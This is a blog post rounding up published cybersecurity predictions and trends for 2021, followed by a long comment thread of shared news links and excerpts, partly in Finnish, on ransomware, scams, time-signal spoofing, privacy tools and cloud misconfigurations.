Nothing is more difficult than making predictions. For this reason I did not do any “predictions for 2021 cyber security” posting before year 2021 started. Instead of trowing out wild ideas what might be coming, I have collected here some trends other people have predicted or reported.
The State of internet security in 2020 was hard. The trends that stormed last year will continue long to 2021: “Rapidly accelerated digital transformations, opportunistic phishing campaigns, discontinuity of information security operations and financial constraints are creating the perfect storm in a COVID-19-disrupted world.” Last year trend was Instead of ‘bring your own device’, these days it’s rather ‘bring your own office’.
2020 was a bumper year for cybercriminals, and this boom is expected to continue into 2021. 2021 Cybersecurity and IT Failures Roundup article presents you Lessons learned from the many failures, interruptions, crimes and other IT-related setbacks that made the news in 2020. Smart cyber security people have read about them and learned their lesson.
Kaspersky’s top three cybersecurity predictions for 2021 are increase in targeted attacks, attacks that are more disruptive exploiting contemporary issues and we will continue to have frequent and significant data breaches. I can pretty much agree on those. Cybersecurity must adapt to counter new threats in a transformed world
Head of Europol’s European Cybercrime Centre: there are no systems that cannot be breached article says that humankind has to choose between evolution by digitization, and stagnation. Naturally, the world is moving ahead. We can’t be naive and expect that bad things will not happen along with it. “We can’t be naive and expect that bad things will not happen along with it. Resilience is important.”
In 2021 Trend Micro predicts that cybercriminals will look to home networks as a critical launch pad to compromising corporate IT and IoT networks. New Cybersecurity Threat Predictions for 2021 article points out the the traditional network perimeter has been replaced with multiple edge environments, WAN, multi-cloud, data center, remote worker, IoT, and more, each with its unique risks.
DDoS attacks: Big rise in threats to overload business networks. Cyber attackers are threatening to take organisations offline with DDoS attacks if they aren’t paid bitcoin by a deadline – but victims are being urged not to give in to demands.
One sure bet is that ransomware attacks will only escalate further over this year. Pay-or-Get-Breached Ransomware Schemes Take Off in 2021. In 2020, ransomware attackers moved quickly to adopt so-called “double extortion” schemes, which means that first they encrypt your data so you can’t access it and then they say they will publish your most secret data for other people to see if you don’t pay up. Ransomware victims that have backups are paying ransoms to stop hackers leaking their stolen data.
Modern cybercrime is becoming increasingly open-sourced which means that already some of the most sophisticated and notorious cybercriminals are utilizing open-source tools to conduct their criminal activities and this will increase.
Trend Micro survey results claim that AI set to replace humans in cybersecurity by 2030. I am just wondering what this claim means and have people who have answered to the survey really understood AI and cyber security? My predictions is that we will need humans and AI and even traditional solutions for a long long time.
The lack of people with cyber security skills is still a problem for many companies because AI will not replace them any time soon. There are different views how the situation has developed. Cybersecurity Skills Shortage Falls for First Time article claims that that shortfall in skills has therefore dropped from 4.07 million last year to 3.12 million. As The End Of 2020 Approaches, The Cybersecurity Talent Drought Gets Worse article says that information technology industry has a real problem on its hands – and it’s only getting worse. While cybercrime grows exponentially, businesses are facing a severe cybersecurity talent drought. The supply of available, qualified security professionals is insufficient and the competition for services has dramatically increased. Some companies try to make claims that they have invented a “silver bullet” for educating cyber professionals like This educator claims to have invented an entertaining way to learn cybersecurity. Some of the cyber security issues move to cloud, so we need more people who know security and cloud. The Cloud Talent Drought Continues (And Is Even Larger Than You Thought)
Hackers leverage sophisticated and novel techniques to break into networks article tells that recent SolarWinds and JetBrains attacks are prime examples of why state-sponsored attacks are so dangerous. The hackers leveraged sophisticated, novel techniques to break into networks and obtain backdoor access to government agencies and enterprises. Expect to see more break-ins connected to those incidents and expect more similar incidents that have not just year been revealed.
Want to avoid having your online accounts hacked? Enable two-factor authentication. Better than the best password: How to use 2FA to improve your security article tells that this is a crucial security measure that requires an extra step when signing in to high-value services. The article explains how to set up 2FA and which accounts to focus on first.
A new version of OWASP Top-10 is coming this year. OWASP Top-10 2021 Statistics-based proposal article tries to make an OWASP Top-10 2021 predictions calculated by understandable metrics, make everyone able to reproduce the results, and present to an entire community for the feedback.
Privacy is an illusion. But that‘s a good thing article says that everyone’s information is available. It doesn’t matter who you are. Some people would pay lots of money to get that privacy illusion back and some just don’t care. With the Death of Cash, Privacy Faces a Deeply Uncertain Future article says that in One Future We have a Private, Anonymous Alternative to Cash but in the Black Mirror Future the Money in Your Pocket Knows Everything About You. Cash is dying that’s for sure. There are still ways to sen anonymous emails and it is a good idea to prepare to your digital life after death.
Ransomware attacks will explode in 2021 article claims that the Capitol riot and its aftermath makes the case for tech regulation more urgent, but no simpler. Against increased regulation there are freedom of speech sounding issues like Should Jack Dorsey be able to silence the president of the United States? Whether the storming of the US Capitol was an attempted coup, an insurrection, or an assault on democracy is merely a question of semantics. The US is now the focus of global instability. EU chief warns over ‘unfiltered’ hate speech and calls for Biden to back rules for big tech.
Legal requirements for IoT security start to emerge article tells that legislative activities are starting to make security a legal requirement for consumer IoT designs to have vaguely defined “reasonable security features”. US Government is beginning to create legislation mandating IoT security. The US House of Representatives, for instance, introduced H.R. 1668 – The Internet of Things Cybersecurity Improvement Act of 2020. There are NIST recommendations such as NISTIR 8259 — Foundational Cybersecurity Activities for IoT Device Manufacturers. EU introduces a cyber security IoT standard to protect its citizens and ENISA Publishes Guidelines on Securing the IoT Supply Chain.
7 Cybersecurity Predictions for Smart Buildings and Infrastructure for 2021: Continuous patch management and security updates, OT transparency for IT stakeholders, Natively secure OT network, Cloud-based access to remote sites instead of VPN, Zero touch onboarding, More cybersecurity in small facilities, Certified cybersecurity products and solutions.
IoT security is still complicated. For many development teams, the idea of building cybersecurity into their IoT design can seem daunting. 6 essential activities to help developers build in IoT cybersecurity article gives some ideas to improve cyber security in your IoT development.
2,203 Comments
Tomi Engdahl says:
Your Fingerprint Can Be Hacked For $5. Here’s How.
https://blog.kraken.com/post/11905/your-fingerprint-can-be-hacked-for-5-heres-how/
Tomi Engdahl says:
What Happens If Time Gets Hacked
https://www.darkreading.com/vulnerabilities-threats/what-happens-if-time-gets-hacked
Renowned hardware security expert raises alarm on the risk and dangers of cyberattackers targeting the current time-synchronization infrastructure.
BLACK HAT EUROPE 2021 – London – Most people take time synchronization for granted, but it operates on what hardware security expert Adam Laurie calls a “fragile ecosystem.” Laurie, a renowned hardware hacker, here today demonstrated an unnervingly simple way to alter time on a clock.
“I was curious if I could spoof the time” synchronization signal, he explained in a keynote on his research. So he built his own simulated time-signal system using an open source tool called txtempus, which simulates signals for syncing the time on clocks and watches, and ran it on Raspberry Pi outfitted with a radio-frequency identification (RFID) antenna.
Laurie’s contraption overrode the UK region’s official low-frequency, radio broadcast-based clock synchronization signal
The white clock was set to operate normally, communicating with the Network Time Protocol (NTP) that transmits local atomic clock broadcasts to timekeeping devices. The red clock, also was set to communicate with National Physical Laboratory, the UK atomic clock feed via NTP, but Laurie commandeered the feed on that link.
“I overrode the signal” and forced it to display the incorrect time, he said in an interview.
The hack underscored how easily RFID can be abused and how that potentially could wreak havoc by altering time on a wider scale. And unlike other security issues, this risk to time-hacking isn’t rooted in software or hardware vulnerabilities: It’s more about an aging technology and process.
“It’s more of an existential vulnerability because it’s the way the technology evolved and the way it was adopted before anyone was worrying that it’s not an actual secure method,” said Laurie, whose time research is independent of his employer IBM X-Force, where he is the lead hardware hacker.
Time Out
Correct time synchronization affects wide swaths of society: everything from financial transactions that rely on accurate timing of payments, to industrial systems, forensics, and time-stamped network packets on the Internet. Internet of Things (IoT) devices rely on the atomic clock. In his keynote, Laurie cited a 2017 UK report that estimated the cost of time-synchronization failure was a stunning 1 billion British pounds per day.
He also noted government and industry efforts to shore up the security of time synchronization, including that of The Resilient Navigation and Timing Foundation, an international nonprofit advisory council. The foundation has proposed hardening GPS and Global Navigation Satellite System (GNSS) systems to protect spoofing and jamming signals, and adding legal teeth to enforce it.
The Internet’s NTP and PTP distribute time updates and currently could be duped into transmitting spoofed information, he pointed out.
“They’re not the source of time, but they need the external source that tells them the time,” namely the atomic clock, which broadcasts over RF and GPS, Laurie explained.
Ransomware attacks are an obvious threat here, he added.
“If I can take out a financial organization by DOS’ing their atomic clock feed, that would be a very powerful attack,” he said.
“The strongest signal wins, and there’s no authentication” in most of these transmissions, he said. There are technologies for validating signals, but most of the existing RF infrastructure remains insecure, he added.
“There’s a huge, deployed infrastructure that relies on these insecure technologies. This [time] is one of those hidden nasties waiting to bite us,” he said.
Tomi Engdahl says:
Tarvitseeko Windows 10 erillistä virustorjuntaohjelmaa? 21 vaihtoehtoa testattiin, näin kävi
27.11.202111:37|päivitetty27.11.202111:37
AV-Test testasi kaikkiaan 21 erilaista tietoturvaratkaisua Windowsille.
https://www.mikrobitti.fi/uutiset/tarvitseeko-windows-10-erillista-virustorjuntaohjelmaa-21-vaihtoehtoa-testattiin-nain-kavi/486ebeed-2098-4ef4-9582-d7cbd2ea2adb
Monet kriitikot nyrpistelevät nenäänsä Microsoftin omalle Windows Defenderille, joka toimitetaan osana Windows 10 -käyttöjärjestelmää. Ehkä ei kannattaisi, sillä virustorjunta pärjäsi paremmin kuin erinomaisesti riippumattoman AV-Testin kattavassa, kaikkiaan 21 erilaista tietoturvaratkaisua sisältäneessä testissä.
Windows Defenderin tulos oli 18 pistettä, ja sovellus rankattiin parhaimpien vaihtoehtojen joukkoon. Käytännössä siis Windows 10:n peruskäyttäjälle riittää erinomaisesti Microsoftin oma turvaohjelma, eikä erityistä syytä hankkia maksullista ratkaisua juuri ole.
https://www.av-test.org/en/antivirus/home-windows/
Microsoft Defender is amongst the best antiviruses for Windows 10, Windows 11
https://www.windowslatest.com/2021/11/27/microsoft-defender-is-amongst-the-best-antiviruses-for-windows/
Tomi Engdahl says:
Introducing App Tracking Protection for Android: The easiest way to block trackers lurking in your apps
https://spreadprivacy.com/introducing-app-tracking-protection/
DuckDuckGo is launching App Tracking Protection for Android into beta, a new feature in our existing app that will block third-party trackers like Google and Facebook lurking in other apps.
Join the private waitlist from our Android app today and help shape the future of App Tracking Protection!
DuckDuckGo wants to stop apps tracking you on Android
The latest update promises to block invasive data collection across your whole phone.
https://www.wired.com/story/duckduckgo-android-app-tracking-block/
Tomi Engdahl says:
Hands-On with DuckDuckGo App Tracking Protection
https://www.thurrott.com/cloud/259520/hands-on-with-duckduckgo-app-tracking-protection
Last week, DuckDuckGo announced that it was adding App Tracking Protection to its mobile app on Android, and the firm was nice enough to give me an invite to the beta. And from what I can tell over several days of usage, this feature works quite well. And I’m more than a bit troubled by the secret tracking activity it’s discovered—and blocked—on my phone.
Tracking protection is simple enough on the desktop, at least for web apps: just install an extension like uBlock Origin or DuckDuckGo Privacy Essentials and you’re good to go. Mobile, of course, is a bit trickier. On the iPhone, Apple added privacy controls, including mobile app anti-tracking functionality, in IOS 14.5 back in April. But we’re unlikely to see anything like that on Android. Google, after all, makes the vast majority of its revenues from advertising, and that requires them to allow tracking throughout Android.
Tomi Engdahl says:
Advanced Virtual CISO for Remote Teams
https://pentestmag.com/advanced-virtual-ciso-for-remote-teams/
The Virtual Chief Information Security Officer (vCISO) is becoming a preferred solution for small, medium, and even some large businesses. For those who are not familiar with the vCISO I will share what this role actually is, and then step into what makes up an AvCISO.
What is a vCISO?
A good description of a vCISO is “a service designed to make top-tier security analysts available to your organization for security expertise and guidance.” Many small organizations often mistakenly think they don’t have the need for top-tier security analysts or that they’re too small to be targeted by attackers. The bad news, industry compliance requirements don’t agree and attackers view you as an easy target.
Above the ‘Covered Entity’ is the regulated company, and they are required to provide a CISO that is “employed by the Covered Entity, one of its Affiliates or a Third Party Service Provider”. Hence, the birth of the Virtual Chief Information Security Officer.
In case you’re wondering, “a vCISO is no different than a full-time chief information security officer except a vCISO is an outsourced security advisor and not onsite full time. A CISO is generally a senior-level executive who is responsible for establishing and maintaining the enterprise vision, strategy, and program to ensure information assets and technologies are adequately protected.”
When combining all of the expectations, roles, responsibilities, and expertise required of a CISO, it becomes clear that the need for a third party Virtual CISO is often an ideal solution. Smaller organizations often don’t have a need for a full time CISO, and the cost of a full time headcount can put this out of reach. However, this does not eliminate the need for developing solutions for remote teams, implementing managed services that can provide policy & compliance overview, close visibility gaps, identify & mitigate security vulnerabilities, and investigate breaches which are the roles that make up the building blocks of what we call the AvCISO or ‘Advanced Virtual Chief Information Security Officer’.
Tomi Engdahl says:
White House Blacklists 8 Chinese Quantum Computing Companies Citing National Security Risks: Report
https://dailyhodl.com/2021/11/28/white-house-blacklists-8-chinese-quantum-computing-companies-citing-national-security-risks-report/
The Biden Administration has announced that it is blacklisting eight Chinese quantum computing companies over concerns that the technology they possess poses a threat to national security.
The companies have been added to the U.S. Department of Commerce’s Entity List, which is a national security tool used by the Bureau of Industry and Security (BIS).
Tomi Engdahl says:
Highly Anonymous Squid Proxy Configuration for Linux.
https://github.com/ind3p3nd3nt/AnonSquid
Tomi Engdahl says:
Digging into Google’s push to freeze ePrivacy
Across Europe, big adtech’s reach has grown long indeed…
https://techcrunch.com/2021/11/01/digging-into-googles-push-to-freeze-eprivacy/
Tomi Engdahl says:
Tales of the Oldhat: Johnny’s First Red Box
https://hacker-ethic.flynnos.org/2021/10/31/tales-of-the-oldhat-johnnys-first-red-box/
Tomi Engdahl says:
Free Tool Scans Web Servers for Vulnerability to HTTP Header-Smuggling Attacks
https://www.darkreading.com/application-security/free-tool-scans-web-servers-for-vulnerability-to-http-header-smuggling-attacks
A researcher will release an open source tool at Black Hat Europe next week that roots out server weaknesses to a sneaky type of attack.
Tomi Engdahl says:
https://pudding.cool/2021/10/lenna/
In 2021, sharing content is easier than ever. Our lingua franca is visual: memes, infographics, TikToks. Our references cross borders and platforms, shared and remixed a hundred different ways in minutes. Digital culture is collective by default
But as the internet reaches its “dirty 30s,” what happens when pieces of digital culture that have been saved, screenshotted, and reposted for years need to retire? Let’s dig into the story of one of these artifacts: The Lenna image.
The Lenna image may be relatively unknown in pop culture today, but in the engineering world, it remains an icon.
Lena Forsén, the real human behind the Lenna image, was first published in Playboy in 1972. Soon after, USC engineers searching for a suitable test image for their image processing research sought inspiration from the magazine. They deemed Lenna the right fit and scanned the image into digital, RGB existence.
Tomi Engdahl says:
Miljoonia euroja häipynyt puhelinhuijareiden matkaan – Traficom ja teleoperaattorit valmistelevat uusia keinoja rikosten estämiseksi
Talous 29.11.2021
Nikke Kinnunen
https://www.maaseuduntulevaisuus.fi/talous/artikkeli-1.1659633?fbclid=IwAR097wtbOsN0-m5GReO3tSx5l0uf4PCtAPmxby8KY96XsB-upcSIhiPdXOU
Huijauksissa rikolliset naamioivat puhelun näyttämään siltä, kuin se olisi soitettu suomalaisesta numerosta.
Huijauspuhelut ovat merkittävä ongelma. Keskusrikospoliisin mukaan suomalaiset ovat menettäneet vuosina 2020 ja 2021 teknisen tuen huijauspuheluille 7,1 miljoonaa euroa.
Suomalaiset teleoperaattorit on velvoitettu varmistamaan, että Suomessa soitetussa puhelussa on oikea numero.
Ulkomailta soitettujen puheluiden soittajaa ei kuitenkaan ole nykyisin madollista varmistaa. Siten operaattori ei myöskään voi varmistua siitä, onko soittajalla oikeus käyttää ilmoitettua suomalaista numeroa.
Traficom on alkanut valmistella yhdessä teleoperaattoreiden kanssa keinoja, joilla nämä huijauspuhelut estetään. Vastaisuudessa operaattori voi huolehtia numeroiden olevan oikeita. Puhelun vastaanottaja voi puolestaan olla varma siitä, että suomalaisesta numerosta soitettu puhelu todella soitetaan suomalaisesta liittymästä.
Lisäksi liittymän omistajan ei tarvitse huolehtia siitä, että hänen numeroaan käytettäisiin huijauksiin.
Numeron muuttaminen suomalaisen näköiseksi on huijareiden suosiossa, sillä silloin uhrit vastaavat puheluun paljon todennäköisemmin.
Tyypillisesti huijauspuhelut naamioidaan esimerkiksi teknisen tuen puheluiksi tai pankkien tukipalvelusoitoiksi. Näissä rikollinen tekeytyy esimerkiksi teknisen tuen tai pankin työntekijäksi ja pyytää verkkopankkitunnuksia tai lupaa muodostaa etäyhteys uhrin tietokoneelle.
Tomi Engdahl says:
Suomalaisilta on kähvelletty ennätyssumma rahaa verkossa asiantuntija varoittaa kavalasta nettihuijauksesta https://www.is.fi/digitoday/art-2000008434865.html
Suomalaisilta on tänä vuonna kähvelletty ennätysmäärä euroja erilaisissa nettihuijauksissa. Poliisin mukaan huijausten yhteenlaskettu menetys on yli 35 miljoonaa euroa.
Vanha huijauskikka jälleen liikkeellä: tilinumero sähköpostissa vaihtuu ja huijari vie rahat https://www.kauppalehti.fi/uutiset/vanha-huijauskikka-jalleen-liikkeella-tilinumero-sahkopostissa-vaihtuu-ja-huijari-vie-rahat/0f61510e-aafa-4ef3-90c5-f49c83a6bded
Vuosia vanha kikka kiertää verkossa edelleen ja saastuttaa järjestelmiä. It-yrittäjä Mikko Aaltonen varoittaa LinkedInissä haittaohjelmasta, johon hän on törmännyt kahdellakin asiakkaallaan.
Kyse on Outlookin saastuttaneesta haitakkeesta, joka tunnistaa lähetettävässä sähköpostissa olevan tilinumeron ja vaihtaa sen toiseksi. Toisessa Aaltosen mainitsemassa tapauksessa on työntekijä ilmoittanut palkanlaskijalle oman tilinumeronsa, toisessa on kyse ollut kansainvälistä kauppaa tekevästä yrityksestä.
Tomi Engdahl says:
“AI and ML will be an enabler for cybersecurity for the foreseeable future”
https://cisomag.eccouncil.org/ai-and-ml-will-be-an-enabler-for-cybersecurity-for-the-foreseeable-future/
Humans play a critical role in cybersecurity, and they’re often termed the “weakest link.” Cisco’s 2021 Cyber Security Threat Trends report reveals an alarming dominance of phishing attacks, accounting for 90% of data breaches. How can employers raise the bar in avoiding the exploitation of human behavior or psychology? And how can we have a better-integrated approach to security?
Humans certainly are the weakest link in cybersecurity. Usually because of negligence, but sometimes because of insider threats. The one consistent statistic I encounter every year is that phishing attacks account for most successful breaches. It is because phishing is easy to do for hackers, and it works. It used to be that you would get an email from a prince in a faraway land saying that he needs your bank account number to deposit funds. Now, a phish may appear to be a message from your boss, from a store where you shop, a bank, or even a friend. Hackers have come a long way in being able to mimic graphics and logos; they use social engineering to gain knowledge of your work, interests, and friend groups on social media platforms.
Companies can raise the bar by doing regular training with employees on how to recognize a phish. They need to teach the psychology of human behavior and where the vulnerabilities may lie in networks and devices from people. Gamification is a popular tool for that kind of training. Corporate programs need to include cyber hygiene to include strong passwords, multi-factor authentication, and incident response as a part of their operational mission. Also, if they must, they can restrict who has access to databases and sites on the interest via identity and access management tools. For insider threats, monitoring aberrant behaviors can work, but it is a challenge.
Tomi Engdahl says:
“AI and ML will be an enabler for cybersecurity for the foreseeable future”
https://cisomag.eccouncil.org/ai-and-ml-will-be-an-enabler-for-cybersecurity-for-the-foreseeable-future/
What are some of the emerging technologies in security? Would these generate opportunities and create challenges?
We are proceeding in an era of “Malthusian” advances in science and technology, enabled by faster computing and ever-expanding data analytics. Those emerging technologies are significantly impacting cybersecurity. They include artificial intelligence (AI), machine learning, high-performance computing, cloud, edge computing, 5G, and eventually quantum technologies.
Computing systems that employ AI and ML are becoming more pervasive and critical to cyber operations and have become a major focus of cybersecurity research development and investments. Advanced 5G and wireless networks will benefit higher traffic capacities, lower latency, increased reliability, and enable processing and analytics in real-time. Edge computing strives to bring real-time computation, data storage, and operations closer to the device, rather than relying on a central location, avoiding latency issues. Technologies that improve capabilities for discovering, categorizing, monitoring, synthesizing, and automating the analysis of data are advantages in mitigating cybersecurity threats. Specifically, such tech can be used to bolster botnet detection and mitigation technology, data visualization tools, active malware protection, rootkit detection and mitigation technology, and incident response analytics.
Emerging tech can be a two-way street for good and bad. Artificial intelligence and machine learning can be used by hackers to automate target selection and more. Threat actors, especially state-sponsored and criminal enterprises, are becoming more sophisticated by searching for vulnerabilities and infiltrating malware by adapting (and automating), enabling machine learning, deep learning, artificial intelligence, and other analytic tools. SolarWinds was more than a wakeup call for those realities.
Also, the emergence of the Internet of Things presents special security challenges. There are an estimated 44 billion IoT endpoints today and trillions of sensors connected to those endpoints. Hackers have many attack options and entries for inserting malware into such a large and unregulated attack surface.
Tomi Engdahl says:
Tell us your top three cyberthreat predictions for 2022.
Critical Infrastructure (CI) and supply chain will be targeted even more in 2022 (state-sponsored, cybercriminal gangs) with ransomware and malware attacks. • Investment and risk strategies will expand in conducting vulnerability assessments and filling operational gaps with cybersecurity tools. Tools include Data Loss Prevention (DLP), encryption, identity and access management solutions, log management, and SIEM platforms.
• Despite efforts to attract workers to security and tech jobs, the qualified cybersecurity worker shortage will continue to pose major operational challenges. Both the public and private sectors are currently facing challenges from a dearth of cybersecurity talent. A report out from the firm Cybersecurity Ventures estimates there are 3.5 million unfilled cybersecurity jobs in 2021. 2022 is not showing any signs of improvement in hiring.
• The Internet of Things (IoT) will pose a growing cybersecurity risk. IoT’s exponential connectivity is an ever-expanding mesh of networks and devices.
https://cisomag.eccouncil.org/ai-and-ml-will-be-an-enabler-for-cybersecurity-for-the-foreseeable-future/
Tomi Engdahl says:
How SASE can help secure your network against online threats
https://brand-studio.fortune.com/vmware/How-sase-can-help-secure-your-network-against-online-threats/?prx_t=eQIHAAAAAAoPEQA&fbclid=IwAR19J5sUmPQjOTPLLTNpmKdc8g3doFUvh6tx-yiNKRoJX30YFNaxeLnSF0g
VMware’s cloud-based secure access service edge solutions provide speed and security for working from anywhere.
Safeguarding cloud-native organizations at potential points of network failure, while maintaining productivity at scale, is a complex challenge that demands an equally cloud-native solution.
Nearly two years into the COVID-19 pandemic, and even as seven out of 10 white-collar workers continue to do their jobs remotely, many still struggle to productively collaborate online. And with teams spread across cloud networks, the threat of a cybersecurity breach is increased: By 2025, cybercrime such as intellectual property theft, ransomware, and fraud could cost global organizations as much as $10.5 trillion annually. Safeguarding cloud-native organizations at potential points of network failure, while maintaining productivity at scale, is a complex challenge that demands an equally cloud-native solution.
https://brand-studio.fortune.com/vmware/How-sase-can-help-secure-your-network-against-online-threats/?prx_t=eQIHAAAAAAoPEQA&fbclid=IwAR19J5sUmPQjOTPLLTNpmKdc8g3doFUvh6tx-yiNKRoJX30YFNaxeLnSF0g
Tomi Engdahl says:
BGP Hijacking Attack – Pentestmag
https://pentestmag.com/bgp-hijacking-attack/
BGP is a routing protocol that connects larger groups of networks worldwide known as Autonomous Systems such as ISP providers, large tech enterprises, or government agencies.
It is simply the glue that connects the Internet together
BGP is used for reachability information and routing data packets from one large network to another.
BGP hijacking is sending traffic to a different destination than the real intended one to intercept the packets.
Today, we learned about the BGP routing protocol and how it’s easy for any AS system to advertise specific IP ranges that claim the shortest paths to the target destinations and perform hijack attacks. Also, we demonstrated the impact of such hijacks through the MITM attack targeting the FTP client credentials.
Tomi Engdahl says:
PWN methodology — LINUX – Pentestmag
https://pentestmag.com/pwn-methodology-linux/
current methodology for approaching targets during binary exploitation on Linux OS.
Tomi Engdahl says:
Huge fines and a ban on default passwords in new UK law
https://www.bbc.com/news/technology-59400762
The government has introduced new legislation to protect smart devices in people’s homes from being hacked. Default passwords for internet-connected devices will be banned, and firms which do not comply will face huge fines.
Tomi Engdahl says:
Google: Half of compromised cloud instances have weak or no passwords
https://www.zdnet.com/article/google-half-of-compromised-cloud-instances-have-weak-or-no-passwords/
Online criminals are deploying cryptocurrency miners within just 22 seconds of compromising misconfigured cloud instances running on Google Cloud Platform (GCP).
Tomi Engdahl says:
Ethän käytä mitään näistä salasanoista? Sinut voidaan hakkeroida alle sekunnissa https://www.is.fi/digitoday/tietoturva/art-2000008418043.html
Kirosanat ja ulosteet kelpaavat monen suomalaisen salasanaksi. Ehkä ei kannattaisi. Suomen suosituimmat salasanat on listattu. Salasanojen hallintasovellus NordPass julkaisi normaalin globaalin listansa lisäksi nyt myös maakohtaiset listat myös Suomesta. Meikäläisittäin top 20:ssä esiintyy useita kirosanoja ja myös ihan sitä itseään.
Tomi Engdahl says:
Tarvitseeko Windows 10 erillistä virustorjuntaohjelmaa? 21 vaihtoehtoa testattiin, näin kävi | Mikrobitti
https://www.mikrobitti.fi/uutiset/tarvitseeko-windows-10-erillista-virustorjuntaohjelmaa-21-vaihtoehtoa-testattiin-nain-kavi/486ebeed-2098-4ef4-9582-d7cbd2ea2adb
Microsoft Defender is amongst the best antiviruses for Windows 10, Windows 11
https://www.windowslatest.com/2021/11/27/microsoft-defender-is-amongst-the-best-antiviruses-for-windows/
Windows Defender, which comes pre-installed on Windows 10 and Windows 11, is amongst the best antiviruses in 2021. That’s according to AV-TEST, which is an independent IT security institute that performs various tests to rank antivirus programs based on performance, security and other factors.
Tomi Engdahl says:
4 Android Banking Trojan Campaigns Targeted Over 300, 000 Devices in
2021
https://thehackernews.com/2021/11/4-android-banking-trojan-campaigns.html
Four different Android banking trojans were spread via the official Google Play Store between August and November 2021, resulting in more than 300, 000 infections through various dropper apps that posed as seemingly harmless utility apps to take full control of the infected devices.
Tomi Engdahl says:
Telcos to get expanded scam-blocking powers through telecommunications law amendment https://www.zdnet.com/article/telcos-to-get-expanded-scam-blocking-powers-through-telecommunications-law-amendment/
Telstra is developing a new cyber safety capability designed to automatically detect and block scam SMS messages in light of new regulatory changes for the telecommunications sector.
Tomi Engdahl says:
Kaspersky – APT annual review 2021
https://securelist.com/apt-annual-review-2021/105127/
In the Global Research and Analysis Team at Kaspersky, we track the ongoing activities of more than 900 advanced threat actors and activity clusters. For this annual review, we have tried to focus on what we consider to be the most interesting trends and developments of the last 12 months. This is based on our visibility in the threat landscape and it’s important to note that no single vendor has complete visibility into the activities of all threat actors.
Tomi Engdahl says:
Detecting SILENT CHOLLIMA’s Custom Tooling
https://www.crowdstrike.com/blog/how-falcon-overwatch-detected-silent-chollima-custom-tooling/
OverWatch threat hunters detected a burst of suspicious reconnaissance activity in which the threat actor used the Smbexec tool under a Windows service account. Originally designed as a penetration testing tool, Smbexec enables covert execution by creating a Windows service that is then used to redirect a command shell operation to a remote location over Server Message Block (SMB) protocol. This approach is valuable to threat actors, as they can perform command execution under a semi-interactive shell and run commands remotely, ultimately making the activity less likely to trigger automated detections.
Tomi Engdahl says:
Understanding the Adversary: How Ransomware Attacks Happen
https://securityintelligence.com/posts/how-ransomware-attacks-happen/
IBM Security X-Force Incident Response (IR) has responded to hundreds of ransomware incidents across every geography and industry. As we have taken time to analyze these incidents, a clear pattern has emerged. Although we observe dozens of ransomware groups in operation across the globe, many with multiple affiliate groups working under them, most ransomware actors tend to follow a similar attack flow and set of standard operating procedures.
Tomi Engdahl says:
Traficom etsii keinoja kansainvälisten huijaussoittojen estämiseksi https://www.epressi.com/tiedotteet/telekommunikaatio/traficom-etsii-keinoja-kansainvalisten-huijaussoittojen-estamiseksi.html
Liikenne- ja viestintävirasto Traficom valmistelee yhteistyössä Suomessa toimivien teleoperaattoreiden kanssa keinoja estää huijauspuheluissa yleiseksi muodostunut soittajan numeron väärentäminen. Tavoitteena on kansainvälisten rikollisten toiminnan vaikeuttaminen ja estäminen.
Tomi Engdahl says:
How Decryption of Network Traffic Can Improve Security
https://threatpost.com/decryption-improve-security/176613/
Strong encryption is critical to protecting sensitive business and personal data. Google estimates that 95 percent of its internet traffic uses the encrypted HTTPS protocol, and most industry analyst firms conclude that between 80-90 percent of network traffic is encrypted today. This is a significant step forward for data integrity and consumer privacy. However, organizations with a commitment to data privacy aren’t the only ones who see value in obscuring their digital footprint in encrypted traffic. Cybercriminals have been quick to weaponize encryption as a means to hide their malicious activity in otherwise benign traffic.
Tomi Engdahl says:
APT groups from China, Russia, and India adopt novel attack technique
https://therecord.media/apt-groups-from-china-russia-and-india-adopt-novel-attack-technique/
State-sponsored hacking groups, also known as advanced persistent threats (ATPs), have adopted this year a new attack technique called “RTF Template Injection, ” which has brought a new twist and made their attacks harder to detect and stop. In a report today, email security firm Proofpoint said that APTs from China, Russia, and India are already exploiting this technique, which they also expect to see adopted by financially-motivated threat actors as well.
Tomi Engdahl says:
Suomalaisten tiedot ovat amerikkalaisilla palvelimilla: “Merkittävää tiedustelutietoa”
https://www.is.fi/digitoday/tietoturva/art-2000008441552.html
Digi- ja väestötietovirasto vakuuttaa suomalaisten tietojen olevan turvassa. Kansalaisten sähköisiä oikeuksia ajava järjestö ei ole asiasta yhtä varma. DVV tavasta käsitellä suomalaisten tietoja on puhjennut oikeusriita. Ihmisten oikeuksia digitaalisessa maailmassa ajava Electronic Frontier Finland eli Effi ry valitti Helsingin hallinto-oikeuteen DVV:n päätöksestä olla kertomatta, miten suomalaisten tiedot on suojattu Amazon Web Services -palvelussa (AWS).
Yhdysvaltalainen AWS on maailman suurimpiin teknologiayrityksiin kuuluvan Amazonin pilvipalveluihin erikoistunut tytäryhtiö. Se myös vastaa Suomi.fi-portaalin tuotannosta.
Tomi Engdahl says:
Top 10 AWS Security Misconfiguration
https://www.trendmicro.com/en_us/devops/21/k/top-10-aws-security-misconfigurations.html
Misconfigurations pose the biggest threat to cloud security. We compiled the top 10 AWS services with the highest misconfiguration rates.
Tomi Engdahl says:
FBI document shows what data can be obtained from encrypted messaging apps
https://therecord.media/fbi-document-shows-what-data-can-be-obtained-from-encrypted-messaging-apps/
A recently discovered FBI training document shows that US law enforcement can gain limited access to the content of encrypted messages from secure messaging services like iMessage, Line, and WhatsApp, but not to messages sent via Signal, Telegram, Threema, Viber, WeChat, or Wickr.
Tomi Engdahl says:
Twitter Bans Users From Posting ‘Private Media’ Without a Person’s Consent
https://thehackernews.com/2021/11/twitter-bans-users-from-posting-private.html
Twitter on Tuesday announced an expansion to its private information policy to include private media, effectively prohibiting the sharing of photos and videos without express permission from the individuals depicted in them with an aim to curb doxxing and harassment.
Tomi Engdahl says:
Fact: 94% of successful malware attacks now begin with phishing. Here’s what three industry experts have to say about identifying and preventing attacks:
https://thehackernews.com/2021/07/3-steps-to-strengthen-your-ransomware.html via The Hacker News
Stay #CyberFit with Acronis
#CyberProtection #MSP #ManagedServices
Tomi Engdahl says:
https://www.nbcnews.com/tech/security/still-paying-antivirus-software-experts-say-probably-dont-need-rcna6335
Tomi Engdahl says:
Iskikö tietomurto itseesi tai firmaasi? Toimi näin
https://www.tivi.fi/uutiset/tv/883ce01d-e56f-4b00-985b-b2792e8e13af
